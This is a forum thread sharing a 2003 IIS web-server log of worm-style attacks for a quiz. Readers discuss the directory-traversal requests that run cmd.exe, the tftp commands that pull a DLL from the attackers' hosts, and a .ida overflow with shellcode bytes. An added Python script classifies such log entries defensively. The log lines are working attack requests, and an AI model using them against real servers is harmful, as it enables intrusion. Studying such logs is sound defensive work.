
[Share] Everyone take a look. Good stuff!

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-04-27 04:19:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-04-27 04:19:37 203.40.27.231 - 61.54.86.69 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-04-27 04:40:46 61.54.36.8 - 61.54.86.69 80 GET /scripts/root.exe /c+dir 404 -
2003-04-27 04:40:46 61.54.36.8 - 61.54.86.69 80 GET /MSADC/root.exe /c+dir 403 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /msadc/..%5c../..%5c../..%5c/..\../..\../..\../winnt/system32/cmd.exe /c+dir 403 -
2003-04-27 04:45:22 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:45:25 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 04:49:25 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 04:49:53 61.54.36.8 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:51:36 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 04:53:14 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 04:54:17 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 04:55:00 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 04:55:46 61.54.36.8 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:25:14 61.54.12.253 - 61.54.86.69 80 GET /scripts/root.exe /c+dir 404 -
2003-04-27 05:25:17 61.54.12.253 - 61.54.86.69 80 GET /MSADC/root.exe /c+dir 403 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../httpodbc.dll - 500 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /msadc/..%5c../..%5c../..%5c/..\../..\../..\../winnt/system32/cmd.exe /c+dir 403 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:30:51 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:31:28 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:32:45 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:32:59 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:33:44 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:35:59 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:37:43 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:38:22 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:40:29 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:43:55 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:47:12 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:47:12 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:59:09 61.54.92.146 - 61.54.86.69 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 400 -

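     I saw this while helping someone with a security check.

     A quiz for everyone:
     1. Which attack methods did the other side use?
     2. Which ones succeeded, and which ones failed?
     3. What vulnerabilities does the system have?
     4. How should the vulnerabilities be patched?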

[Share] Everyone take a look. Good stuff!

There's a CGI one; it should be like the one Yuan Ge discovered~


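[Share] Everyone take a look. Good stuff!

I know that the ones followed by 200 mean the intruder successfully executed the unicode vulnerability.
A 403 is probably something like insufficient permissions, and a 404 means the page could not be found.
The intruder also used tftp to upload a dll file; I don't know what it is for. The first two intruders are probably the same person, since the renamed file name is the same!
The last one is a 400; I'm not quite sure what that means, but it probably didn't succeed either!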
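
As an added example (not part of the original thread), this Python sketch triages a log in the format posted above: it reads the #Fields header, percent-decodes each request and labels it by technique, so the status codes can be read per client. The sample lines are constructed with documentation addresses and a shortened payload, and the rule names and patterns are assumptions made for this illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the thread's log format (RFC 5737 addresses, payload shortened).
SAMPLE = r"""#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-04-27 04:19:37 198.51.100.7 - 192.0.2.10 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-04-27 04:40:46 198.51.100.9 - 192.0.2.10 80 GET /scripts/root.exe /c+dir 404 -
2003-04-27 04:40:47 198.51.100.9 - 192.0.2.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:45:25 198.51.100.9 - 192.0.2.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.9%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:59:09 198.51.100.23 - 192.0.2.10 80 GET /default.ida XXXXXXXXXXXXXXXX=a 400 -
"""

# Hypothetical rule set; first match wins, run on the decoded, lower-cased request.
RULES = [
    ("tftp-download", re.compile(r"cmd\.exe.*\btftp\b")),
    ("dir-traversal-cmd", re.compile(r"\.\.[\\/].*cmd\.exe")),
    ("shell-probe", re.compile(r"/(root|cmd)\.exe")),
    ("ida-idq-overflow", re.compile(r"\.id[aq] \S{16,}")),
    ("webdav-options", re.compile(r"^options ")),
]

def parse(text):  # yields one dict per request, keyed by the #Fields names
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split(" ")
            if len(parts) == len(fields):  # skip truncated or malformed lines
                yield dict(zip(fields, parts))

def classify(row):
    raw = f"{row['cs-method']} {row['cs-uri-stem']} {row['cs-uri-query']}"
    req = unquote(raw).replace("+", " ").lower()  # %5c -> \, %20 and + -> space
    return next((name for name, pat in RULES if pat.search(req)), "other")

def summarize(text):
    """Map (client IP, technique) to a Counter of HTTP status codes."""
    out = {}
    for row in parse(text):
        out.setdefault((row["c-ip"], classify(row)), Counter())[row["sc-status"]] += 1
    return out

def executed(text):  # clients whose traversal request to cmd.exe returned 200
    return sorted({ip for (ip, name), st in summarize(text).items()
                   if name == "dir-traversal-cmd" and st["200"]})

if __name__ == "__main__":
    print(summarize(SAMPLE), executed(SAMPLE))
```

On IIS a 502 on the tftp requests means the CGI output lacked valid HTTP headers, so it does not by itself show that the command failed; the written file has to be checked for on disk.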


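[Share] Everyone take a look. Good stuff!

     There are three methods in total:
                     1. WebDAV overflow
                     2. unicode
                     3. IDQ.IDA overflow
     And that unicode one is actually the NIMDA worm's infection process via IIS.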


[Share] Everyone take a look. Good stuff!

This host seems to be XP, though; the IIS is 5.1.


[Share] Everyone take a look. Good stuff!

Is that so?
Does XP have the unicode vulnerability?
The IIS is 5.1, right?


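[Share] Everyone take a look. Good stuff!

I don't know whether the unicode vulnerability exists on XP; I only know that with IIS 5.1 the operating system is usually XP.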


[Share] Everyone take a look. Good stuff!

The people in charge are all useless :( No wonder there's no progress.


[Share] Everyone take a look. Good stuff!

I don't understand it!!! :(


[Share] Everyone take a look. Good stuff!

Damn it, can't there be some new tricks?

